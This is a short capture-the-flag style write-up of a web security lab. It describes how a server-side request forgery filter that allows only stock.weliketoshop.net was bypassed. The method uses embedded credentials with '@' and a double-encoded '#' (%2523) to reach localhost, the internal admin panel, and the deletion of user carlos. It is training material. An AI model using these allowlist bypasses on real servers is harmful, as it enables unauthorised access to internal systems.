We edited the stockApi parameter to localhost and sent the request, but it returned an error stating that only stock.weliketoshop.net was allowed. This indicated that the server was whitelisting only that hostname:
We then tried the URL:
http://username@stock.weliketoshop.net/
This worked because:
- The part before
@is treated as a username for HTTP Basic Auth. - The hostname remains
stock.weliketoshop.net. - The app accepted it since the hostname passed the whitelist check.
This confirmed that the server uses a URL parser that supports embedded credentials.
Next, we tried using # in the URL:
It was rejected because # starts a fragment in a URL, causing the hostname to become malformed. The server blocked it as a suspicious or invalid hostname.
To bypass this, we double-encoded the # as %2523:
%23is the first URL encoding of#.%2523is double encoding.- The server decodes only once, turning
%2523into%23, which becomes#internally. - The original string still looks safe, passing hostname validation, but the server mishandles the username part:
http://username#@stock.weliketoshop.net/
The final exploit used this understanding to reach internal URLs like localhost:
We were able to access the internal Admin Panel and delete the carlos user and solve the lab.
